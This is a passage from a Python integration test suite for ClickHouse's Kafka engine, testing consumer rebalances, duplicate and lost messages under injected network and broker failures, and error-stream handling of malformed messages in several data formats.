instance.query('''
DROP TABLE IF EXISTS test.destination;
CREATE TABLE test.destination (
key UInt64,
value UInt64,
_topic String,
_key String,
_offset UInt64,
_partition UInt64,
_timestamp Nullable(DateTime('UTC')),
_consumed_by LowCardinality(String)
)
ENGINE = MergeTree()
ORDER BY key;
''')
# kafka_cluster.open_bash_shell('instance')
# time.sleep(2)
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_name = "topic_with_multiple_partitions"
kafka_create_topic(admin_client, topic_name, num_partitions=11)
cancel = threading.Event()
msg_index = [0]
def produce():
while not cancel.is_set():
messages = []
for _ in range(59):
messages.append(json.dumps({'key': msg_index[0], 'value': msg_index[0]}))
msg_index[0] += 1
kafka_produce(kafka_cluster, 'topic_with_multiple_partitions', messages)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
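# Spin up the consumers one by one: every new Kafka table joins the same consumer group
# ('rebalance_test_group') and therefore forces a rebalance while messages keep flowing.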
for consumer_index in range(NUMBER_OF_CONCURRENT_CONSUMERS):
table_name = 'kafka_consumer{}'.format(consumer_index)
logging.debug(("Setting up {}".format(table_name)))
instance.query('''
DROP TABLE IF EXISTS test.{0};
DROP TABLE IF EXISTS test.{0}_mv;
CREATE TABLE test.{0} (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'topic_with_multiple_partitions',
kafka_group_name = 'rebalance_test_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 33,
kafka_flush_interval_ms = 500;
CREATE MATERIALIZED VIEW test.{0}_mv TO test.destination AS
SELECT
key,
value,
_topic,
_key,
_offset,
_partition,
_timestamp,
'{0}' as _consumed_by
FROM test.{0};
'''.format(table_name))
# kafka_cluster.open_bash_shell('instance')
# Wait for test.kafka_consumerX to start consuming ...
instance.wait_for_log_line('kafka_consumer{}.*Polled offset [0-9]+'.format(consumer_index))
cancel.set()
# Leave the last consumer working on purpose (to finish consuming after all the rebalances)
for consumer_index in range(NUMBER_OF_CONCURRENT_CONSUMERS - 1):
logging.debug(("Dropping test.kafka_consumer{}".format(consumer_index)))
instance.query('DROP TABLE IF EXISTS test.kafka_consumer{} SYNC'.format(consumer_index))
# logging.debug(instance.query('SELECT count(), uniqExact(key), max(key) + 1 FROM test.destination'))
# kafka_cluster.open_bash_shell('instance')
while 1:
messages_consumed = int(instance.query('SELECT uniqExact(key) FROM test.destination'))
if messages_consumed >= msg_index[0]:
break
time.sleep(1)
logging.debug(("Waiting for finishing consuming (have {}, should be {})".format(messages_consumed, msg_index[0])))
logging.debug((instance.query('SELECT count(), uniqExact(key), max(key) + 1 FROM test.destination')))
# Some queries to debug...
# SELECT * FROM test.destination where key in (SELECT key FROM test.destination group by key having count() <> 1)
# select number + 1 as key from numbers(4141) x left join test.destination using (key) where test.destination.key = 0;
# SELECT * FROM test.destination WHERE key between 2360 and 2370 order by key;
# select _partition from test.destination group by _partition having count() <> max(_offset) + 1;
# select toUInt64(0) as _partition, number + 1 as _offset from numbers(400) x left join test.destination using (_partition,_offset) where test.destination.key = 0 order by _offset;
# SELECT * FROM test.destination WHERE _partition = 0 and _offset between 220 and 240 order by _offset;
# CREATE TABLE test.reference (key UInt64, value UInt64) ENGINE = Kafka SETTINGS kafka_broker_list = 'kafka1:19092',
# kafka_topic_list = 'topic_with_multiple_partitions',
# kafka_group_name = 'rebalance_test_group_reference',
# kafka_format = 'JSONEachRow',
# kafka_max_block_size = 100000;
#
# CREATE MATERIALIZED VIEW test.reference_mv Engine=Log AS
# SELECT key, value, _topic,_key,_offset, _partition, _timestamp, 'reference' as _consumed_by
# FROM test.reference;
#
# select * from test.reference_mv left join test.destination using (key,_topic,_offset,_partition) where test.destination._consumed_by = '';
result = int(instance.query('SELECT count() == uniqExact(key) FROM test.destination'))
for consumer_index in range(NUMBER_OF_CONCURRENT_CONSUMERS):
logging.debug(("kafka_consumer{}".format(consumer_index)))
table_name = 'kafka_consumer{}'.format(consumer_index)
instance.query('''
DROP TABLE IF EXISTS test.{0};
DROP TABLE IF EXISTS test.{0}_mv;
'''.format(table_name))
instance.query('''
DROP TABLE IF EXISTS test.destination;
''')
kafka_thread.join()
assert result == 1, 'Messages from kafka get duplicated!'
kafka_delete_topic(admin_client, topic_name)
def test_kafka_no_holes_when_write_suffix_failed(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': 'x' * 300}) for j in range(22)]
kafka_produce(kafka_cluster, 'no_holes_when_write_suffix_failed', messages)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'no_holes_when_write_suffix_failed',
kafka_group_name = 'no_holes_when_write_suffix_failed',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 20,
kafka_flush_interval_ms = 2000;
CREATE TABLE test.view (key UInt64, value String)
ENGINE = ReplicatedMergeTree('/clickhouse/kafkatest/tables/no_holes_when_write_suffix_failed', 'node1')
ORDER BY key;
''')
# initialize PartitionManager ahead of time (it starts a container)
pm = PartitionManager()
instance.query('''
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka
WHERE NOT sleepEachRow(0.25);
''')
instance.wait_for_log_line("Polled batch of 20 messages")
# the tricky part here is that the disconnect must happen after the write prefix, but before the write suffix;
# we have a 0.25 (sleepEachRow) * 20 (rows) = 5 sec window after "Polled batch of 20 messages",
# while the materialized view is still working, to inject the ZooKeeper failure
pm.drop_instance_zk_connections(instance)
instance.wait_for_log_line("Error.*(session has been expired|Connection loss).*while pushing to view")
pm.heal_all()
instance.wait_for_log_line("Committed offset 22")
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.view')
logging.debug(result)
# kafka_cluster.open_bash_shell('instance')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
assert TSV(result) == TSV('22\t22\t22')
def test_exception_from_destructor(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'xyz',
kafka_group_name = '',
kafka_commit_on_select = 1,
kafka_format = 'JSONEachRow';
''')
instance.query_and_get_error('''
SELECT * FROM test.kafka;
''')
instance.query('''
DROP TABLE test.kafka;
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'xyz',
kafka_group_name = '',
kafka_format = 'JSONEachRow';
''')
instance.query('''
DROP TABLE test.kafka;
''')
# kafka_cluster.open_bash_shell('instance')
assert TSV(instance.query('SELECT 1')) == TSV('1')
def test_commits_of_unprocessed_messages_on_drop(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': j + 1}) for j in range(1)]
kafka_produce(kafka_cluster, 'commits_of_unprocessed_messages_on_drop', messages)
instance.query('''
DROP TABLE IF EXISTS test.destination SYNC;
CREATE TABLE test.destination (
key UInt64,
value UInt64,
_topic String,
_key String,
_offset UInt64,
_partition UInt64,
_timestamp Nullable(DateTime('UTC')),
_consumed_by LowCardinality(String)
)
ENGINE = MergeTree()
ORDER BY key;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'commits_of_unprocessed_messages_on_drop',
kafka_group_name = 'commits_of_unprocessed_messages_on_drop_test_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1000,
kafka_flush_interval_ms = 1000;
CREATE MATERIALIZED VIEW test.kafka_consumer TO test.destination AS
SELECT
key,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.kafka;
''')
# Wait for test.kafka_consumer to start consuming
instance.wait_for_log_line('Committed offset [0-9]+')
cancel = threading.Event()
i = [2]
def produce():
while not cancel.is_set():
messages = []
for _ in range(113):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
kafka_produce(kafka_cluster, 'commits_of_unprocessed_messages_on_drop', messages)
time.sleep(0.5)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
time.sleep(4)
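# By now the consumer has presumably polled (but not necessarily flushed) part of the stream;
# dropping and recreating test.kafka here must not lose those in-flight messages - see the
# "Missing data!" assert at the end of the test.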
instance.query('''
DROP TABLE test.kafka SYNC;
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'commits_of_unprocessed_messages_on_drop',
kafka_group_name = 'commits_of_unprocessed_messages_on_drop_test_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 10000,
kafka_flush_interval_ms = 1000;
''')
cancel.set()
instance.wait_for_log_line('kafka.*Stalled', repetitions=5)
# kafka_cluster.open_bash_shell('instance')
# SELECT key, _timestamp, _offset FROM test.destination where runningDifference(key) <> 1 ORDER BY key;
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.destination')
logging.debug(result)
instance.query('''
DROP TABLE test.kafka_consumer SYNC;
DROP TABLE test.destination SYNC;
''')
kafka_thread.join()
assert TSV(result) == TSV('{0}\t{0}\t{0}'.format(i[0] - 1)), 'Missing data!'
def test_bad_reschedule(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': j + 1}) for j in range(20000)]
kafka_produce(kafka_cluster, 'test_bad_reschedule', messages)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'test_bad_reschedule',
kafka_group_name = 'test_bad_reschedule',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1000,
kafka_flush_interval_ms = 1000;
CREATE MATERIALIZED VIEW test.destination Engine=Log AS
SELECT
key,
now() as consume_ts,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.kafka;
''')
instance.wait_for_log_line("Committed offset 20000")
assert int(instance.query("SELECT max(consume_ts) - min(consume_ts) FROM test.destination")) < 8
def test_kafka_duplicates_when_commit_failed(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': 'x' * 300}) for j in range(22)]
kafka_produce(kafka_cluster, 'duplicates_when_commit_failed', messages)
instance.query('''
DROP TABLE IF EXISTS test.view SYNC;
DROP TABLE IF EXISTS test.consumer SYNC;
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'duplicates_when_commit_failed',
kafka_group_name = 'duplicates_when_commit_failed',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 20,
kafka_flush_interval_ms = 1000;
CREATE TABLE test.view (key UInt64, value String)
ENGINE = MergeTree()
ORDER BY key;
''')
instance.query('''
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka
WHERE NOT sleepEachRow(0.25);
''')
instance.wait_for_log_line("Polled batch of 20 messages")
# the tricky part here is that the disconnect must happen after the write prefix, but before we do the commit;
# we have a 0.25 (sleepEachRow) * 20 (rows) = 5 sec window after "Polled batch of 20 messages",
# while the materialized view is still working, to inject the Kafka broker failure
kafka_cluster.pause_container('kafka1')
# if we restore the connection too fast (< 30 sec) librdkafka will not report any timeout
# (an alternative is to decrease the default session timeouts for librdkafka)
#
# if the delay is too long (> 50 sec) the broker will decide to remove us from the consumer group,
# and will start answering "Broker: Unknown member"
instance.wait_for_log_line("Exception during commit attempt: Local: Waiting for coordinator", timeout=45)
instance.wait_for_log_line("All commit attempts failed", look_behind_lines=500)
kafka_cluster.unpause_container('kafka1')
# kafka_cluster.open_bash_shell('instance')
instance.wait_for_log_line("Committed offset 22")
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.view')
logging.debug(result)
instance.query('''
DROP TABLE test.consumer SYNC;
DROP TABLE test.view SYNC;
''')
# After https://github.com/edenhill/librdkafka/issues/2631 the timeout triggers a rebalance,
# making further commits to the topic impossible after getting back online.
# So we get a duplicate in that scenario, but we report the situation properly.
assert TSV(result) == TSV('42\t22\t22')
# if we reach the end of a partition we keep polling until kafka_max_block_size or flush_interval is reached.
# That behavior is a bit questionable - we could instead take bigger pauses between polls
# to do more work in a single pass and give the thread more rest.
# But under peaky load on the Kafka topic the current contract sounds more predictable and
# easier to understand, so let's keep it as is for now.
# We can also reach EOF because we drained the librdkafka internal queue too fast.
def test_premature_flush_on_eof(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'premature_flush_on_eof',
kafka_group_name = 'premature_flush_on_eof',
kafka_format = 'JSONEachRow';
SELECT * FROM test.kafka LIMIT 1;
CREATE TABLE test.destination (
key UInt64,
value UInt64,
_topic String,
_key String,
_offset UInt64,
_partition UInt64,
_timestamp Nullable(DateTime('UTC')),
_consumed_by LowCardinality(String)
)
ENGINE = MergeTree()
ORDER BY key;
''')
# messages created here will be consumed immediately after the MV is created,
# reaching the topic EOF.
# But we should not flush immediately after reaching EOF, because
# the next poll can return more data, and we should respect kafka_flush_interval_ms
# and try to form a bigger block
messages = [json.dumps({'key': j + 1, 'value': j + 1}) for j in range(1)]
kafka_produce(kafka_cluster, 'premature_flush_on_eof', messages)
instance.query('''
CREATE MATERIALIZED VIEW test.kafka_consumer TO test.destination AS
SELECT
key,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.kafka;
''')
# all subscriptions/assignments were done during the SELECT above, so data starts flowing to test.destination
# immediately after the MV is created
instance.wait_for_log_line("Polled batch of 1 messages")
instance.wait_for_log_line("Stalled")
# produce more messages after delay
kafka_produce(kafka_cluster, 'premature_flush_on_eof', messages)
# data was not flushed yet (it will be flushed 7.5 sec after creating MV)
assert int(instance.query("SELECT count() FROM test.destination")) == 0
instance.wait_for_log_line("Committed offset 2")
# it should be a single part, i.e. a single insert
result = instance.query('SELECT _part, count() FROM test.destination group by _part')
assert TSV(result) == TSV('all_1_1_0\t2')
instance.query('''
DROP TABLE test.kafka_consumer;
DROP TABLE test.destination;
''')
def test_kafka_unavailable(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': j + 1}) for j in range(20000)]
kafka_produce(kafka_cluster, 'test_bad_reschedule', messages)
kafka_cluster.pause_container('kafka1')
instance.query('''
CREATE TABLE test.test_bad_reschedule (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'test_bad_reschedule',
kafka_group_name = 'test_bad_reschedule',
kafka_format = 'JSONEachRow',
kafka_commit_on_select = 1,
kafka_max_block_size = 1000;
CREATE MATERIALIZED VIEW test.destination_unavailable Engine=Log AS
SELECT
key,
now() as consume_ts,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.test_bad_reschedule;
''')
instance.query("SELECT * FROM test.test_bad_reschedule")
instance.query("SELECT count() FROM test.destination_unavailable")
# long enough to trigger the issue
time.sleep(30)
kafka_cluster.unpause_container('kafka1')
while int(instance.query("SELECT count() FROM test.destination_unavailable")) < 20000:
print("Waiting for consume")
time.sleep(1)
def test_kafka_issue14202(kafka_cluster):
"""
INSERT INTO a Kafka engine table from an empty SELECT subquery was leading to a failure
"""
instance.query('''
CREATE TABLE test.empty_table (
dt Date,
some_string String
)
ENGINE = MergeTree()
PARTITION BY toYYYYMM(dt)
ORDER BY some_string;
CREATE TABLE test.kafka_q (t UInt64, `some_string` String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'issue14202',
kafka_group_name = 'issue14202',
kafka_format = 'JSONEachRow';
''')
instance.query(
'INSERT INTO test.kafka_q SELECT t, some_string FROM ( SELECT dt AS t, some_string FROM test.empty_table )')
# check instance is alive
assert TSV(instance.query('SELECT 1')) == TSV('1')
instance.query('''
DROP TABLE test.empty_table;
DROP TABLE test.kafka_q;
''')
def test_kafka_csv_with_thread_per_consumer(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'csv_with_thread_per_consumer',
kafka_group_name = 'csv_with_thread_per_consumer',
kafka_format = 'CSV',
kafka_row_delimiter = '\\n',
kafka_num_consumers = 4,
kafka_commit_on_select = 1,
kafka_thread_per_consumer = 1;
''')
messages = []
for i in range(50):
messages.append('{i}, {i}'.format(i=i))
kafka_produce(kafka_cluster, 'csv_with_thread_per_consumer', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
def random_string(size=8):
return ''.join(random.choices(string.ascii_uppercase + string.digits, k=size))
def test_kafka_engine_put_errors_to_stream(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.kafka;
DROP TABLE IF EXISTS test.kafka_data;
DROP TABLE IF EXISTS test.kafka_errors;
CREATE TABLE test.kafka (i Int64, s String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'kafka_engine_put_errors_to_stream',
kafka_group_name = 'kafka_engine_put_errors_to_stream',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 128,
kafka_handle_error_mode = 'stream';
CREATE MATERIALIZED VIEW test.kafka_data (i Int64, s String)
ENGINE = MergeTree
ORDER BY i
AS SELECT i, s FROM test.kafka WHERE length(_error) == 0;
CREATE MATERIALIZED VIEW test.kafka_errors (topic String, partition Int64, offset Int64, raw String, error String)
ENGINE = MergeTree
ORDER BY (topic, offset)
AS SELECT
_topic AS topic,
_partition AS partition,
_offset AS offset,
_raw_message AS raw,
_error AS error
FROM test.kafka WHERE length(_error) > 0;
''')
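# With kafka_handle_error_mode = 'stream' every message exposes the _error and _raw_message
# virtual columns: rows that parsed fine (empty _error) land in test.kafka_data, while broken
# messages are routed to test.kafka_errors together with their raw payload.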
messages = []
for i in range(128):
if i % 2 == 0:
messages.append(json.dumps({'i': i, 's': random_string(8)}))
else:
# Unexpected json content for table test.kafka.
messages.append(json.dumps({'i': 'n_' + random_string(4), 's': random_string(8)}))
kafka_produce(kafka_cluster, 'kafka_engine_put_errors_to_stream', messages)
instance.wait_for_log_line("Committed offset 128")
assert TSV(instance.query('SELECT count() FROM test.kafka_data')) == TSV('64')
assert TSV(instance.query('SELECT count() FROM test.kafka_errors')) == TSV('64')
instance.query('''
DROP TABLE test.kafka;
DROP TABLE test.kafka_data;
DROP TABLE test.kafka_errors;
''')
def gen_normal_json():
return '{"i":1000, "s":"ABC123abc"}'
def gen_malformed_json():
return '{"i":"n1000", "s":"1000"}'
def gen_message_with_jsons(jsons=10, malformed=0):
s = io.StringIO()
# we don't care at which position the error is added
# (the whole broken message is skipped), but we need to be
# sure that at least one error is added,
# otherwise the test will fail.
error_pos = random.randint(0, jsons - 1)
for i in range(jsons):
if malformed and i == error_pos:
s.write(gen_malformed_json())
else:
s.write(gen_normal_json())
s.write(' ')
return s.getvalue()
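# Illustrative example (the position of the malformed object is random):
# gen_message_with_jsons(3, 1) could return
# '{"i":1000, "s":"ABC123abc"} {"i":"n1000", "s":"1000"} {"i":1000, "s":"ABC123abc"} '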
def test_kafka_engine_put_errors_to_stream_with_random_malformed_json(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.kafka;
DROP TABLE IF EXISTS test.kafka_data;
DROP TABLE IF EXISTS test.kafka_errors;
CREATE TABLE test.kafka (i Int64, s String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'kafka_engine_put_errors_to_stream_with_random_malformed_json',
kafka_group_name = 'kafka_engine_put_errors_to_stream_with_random_malformed_json',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_poll_max_batch_size = 1,
kafka_handle_error_mode = 'stream';
CREATE MATERIALIZED VIEW test.kafka_data (i Int64, s String)
ENGINE = MergeTree
ORDER BY i
AS SELECT i, s FROM test.kafka WHERE length(_error) == 0;
CREATE MATERIALIZED VIEW test.kafka_errors (topic String, partition Int64, offset Int64, raw String, error String)
ENGINE = MergeTree
ORDER BY (topic, offset)
AS SELECT
_topic AS topic,
_partition AS partition,
_offset AS offset,
_raw_message AS raw,
_error AS error
FROM test.kafka WHERE length(_error) > 0;
''')
messages = []
for i in range(128):
if i % 2 == 0:
messages.append(gen_message_with_jsons(10, 1))
else:
messages.append(gen_message_with_jsons(10, 0))
kafka_produce(kafka_cluster, 'kafka_engine_put_errors_to_stream_with_random_malformed_json', messages)
instance.wait_for_log_line("Committed offset 128")
# 64 good messages, each containing 10 rows
assert TSV(instance.query('SELECT count() FROM test.kafka_data')) == TSV('640')
# 64 bad messages, each containing one broken row
assert TSV(instance.query('SELECT count() FROM test.kafka_errors')) == TSV('64')
instance.query('''
DROP TABLE test.kafka;
DROP TABLE test.kafka_data;
DROP TABLE test.kafka_errors;
''')
def test_kafka_formats_with_broken_message(kafka_cluster):
# the data was dumped from ClickHouse itself in the following manner:
# clickhouse-client --format=Native --query='SELECT toInt64(number) as id, toUInt16( intDiv( id, 65536 ) ) as blockNo, reinterpretAsString(19777) as val1, toFloat32(0.5) as val2, toUInt8(1) as val3 from numbers(100) ORDER BY id' | xxd -ps | tr -d '\n' | sed 's/\(..\)/\\x\1/g'
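# Each format entry below provides data_sample = [single-row message, 15-row message,
# single-row message, broken message] and an 'expected' JSON row describing what should end up
# in the error stream for the broken message.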
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
all_formats = {
## Text formats ##
# dumped with clickhouse-client ... | perl -pe 's/\n/\\n/; s/\t/\\t/g;'
'JSONEachRow': {
'data_sample': [
'{"id":"0","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
'{"id":"1","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"2","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"3","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"4","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"5","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"6","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"7","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"8","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"9","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"10","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"11","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"12","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"13","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"14","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"15","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
'{"id":"0","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
# broken message
'{"id":"0","blockNo":"BAD","val1":"AM","val2":0.5,"val3":1}',
],
'expected':'''{"raw_message":"{\\"id\\":\\"0\\",\\"blockNo\\":\\"BAD\\",\\"val1\\":\\"AM\\",\\"val2\\":0.5,\\"val3\\":1}","error":"Cannot parse input: expected '\\"' before: 'BAD\\",\\"val1\\":\\"AM\\",\\"val2\\":0.5,\\"val3\\":1}': (while reading the value of key blockNo)"}''',
'supports_empty_value': True,
'printable': True,
},
# JSONAsString doesn't fit to that test, and tested separately
'JSONCompactEachRow': {
'data_sample': [
'["0", 0, "AM", 0.5, 1]\n',
'["1", 0, "AM", 0.5, 1]\n["2", 0, "AM", 0.5, 1]\n["3", 0, "AM", 0.5, 1]\n["4", 0, "AM", 0.5, 1]\n["5", 0, "AM", 0.5, 1]\n["6", 0, "AM", 0.5, 1]\n["7", 0, "AM", 0.5, 1]\n["8", 0, "AM", 0.5, 1]\n["9", 0, "AM", 0.5, 1]\n["10", 0, "AM", 0.5, 1]\n["11", 0, "AM", 0.5, 1]\n["12", 0, "AM", 0.5, 1]\n["13", 0, "AM", 0.5, 1]\n["14", 0, "AM", 0.5, 1]\n["15", 0, "AM", 0.5, 1]\n',
'["0", 0, "AM", 0.5, 1]\n',
# broken message
'["0", "BAD", "AM", 0.5, 1]',
],
'expected':'''{"raw_message":"[\\"0\\", \\"BAD\\", \\"AM\\", 0.5, 1]","error":"Cannot parse input: expected '\\"' before: 'BAD\\", \\"AM\\", 0.5, 1]': (while reading the value of key blockNo)"}''',
'supports_empty_value': True,
'printable':True,
},
'JSONCompactEachRowWithNamesAndTypes': {
'data_sample': [
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["0", 0, "AM", 0.5, 1]\n',
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["1", 0, "AM", 0.5, 1]\n["2", 0, "AM", 0.5, 1]\n["3", 0, "AM", 0.5, 1]\n["4", 0, "AM", 0.5, 1]\n["5", 0, "AM", 0.5, 1]\n["6", 0, "AM", 0.5, 1]\n["7", 0, "AM", 0.5, 1]\n["8", 0, "AM", 0.5, 1]\n["9", 0, "AM", 0.5, 1]\n["10", 0, "AM", 0.5, 1]\n["11", 0, "AM", 0.5, 1]\n["12", 0, "AM", 0.5, 1]\n["13", 0, "AM", 0.5, 1]\n["14", 0, "AM", 0.5, 1]\n["15", 0, "AM", 0.5, 1]\n',
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["0", 0, "AM", 0.5, 1]\n',
# broken message
'["0", "BAD", "AM", 0.5, 1]',
],
'expected':'''{"raw_message":"[\\"0\\", \\"BAD\\", \\"AM\\", 0.5, 1]","error":"Cannot parse JSON string: expected opening quote"}''',
'printable':True,
},
'TSKV': {
'data_sample': [
'id=0\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
'id=1\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=2\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=3\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=4\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=5\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=6\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=7\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=8\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=9\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=10\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=11\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=12\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=13\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=14\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=15\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
'id=0\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
# broken message
'id=0\tblockNo=BAD\tval1=AM\tval2=0.5\tval3=1\n',
],
'expected':'{"raw_message":"id=0\\tblockNo=BAD\\tval1=AM\\tval2=0.5\\tval3=1\\n","error":"Found garbage after field in TSKV format: blockNo: (at row 1)\\n"}',
'printable':True,
},
'CSV': {
'data_sample': [
'0,0,"AM",0.5,1\n',
'1,0,"AM",0.5,1\n2,0,"AM",0.5,1\n3,0,"AM",0.5,1\n4,0,"AM",0.5,1\n5,0,"AM",0.5,1\n6,0,"AM",0.5,1\n7,0,"AM",0.5,1\n8,0,"AM",0.5,1\n9,0,"AM",0.5,1\n10,0,"AM",0.5,1\n11,0,"AM",0.5,1\n12,0,"AM",0.5,1\n13,0,"AM",0.5,1\n14,0,"AM",0.5,1\n15,0,"AM",0.5,1\n',
'0,0,"AM",0.5,1\n',
# broken message
'0,"BAD","AM",0.5,1\n',
],
'expected':'''{"raw_message":"0,\\"BAD\\",\\"AM\\",0.5,1\\n","error":"Cannot parse input: expected '\\"' before: 'BAD\\",\\"AM\\",0.5,1\\\\n': Could not print diagnostic info because two last rows aren't in buffer (rare case)\\n"}''',
'printable':True,
'supports_empty_value': True,
},
'TSV': {
'data_sample': [
'0\t0\tAM\t0.5\t1\n',
'1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'0\t0\tAM\t0.5\t1\n',
# broken message
'0\tBAD\tAM\t0.5\t1\n',
],
'expected':'''{"raw_message":"0\\tBAD\\tAM\\t0.5\\t1\\n","error":"Cannot parse input: expected '\\\\t' before: 'BAD\\\\tAM\\\\t0.5\\\\t1\\\\n': Could not print diagnostic info because two last rows aren't in buffer (rare case)\\n"}''',
'supports_empty_value': True,
'printable':True,
},
'CSVWithNames': {
'data_sample': [
'"id","blockNo","val1","val2","val3"\n0,0,"AM",0.5,1\n',
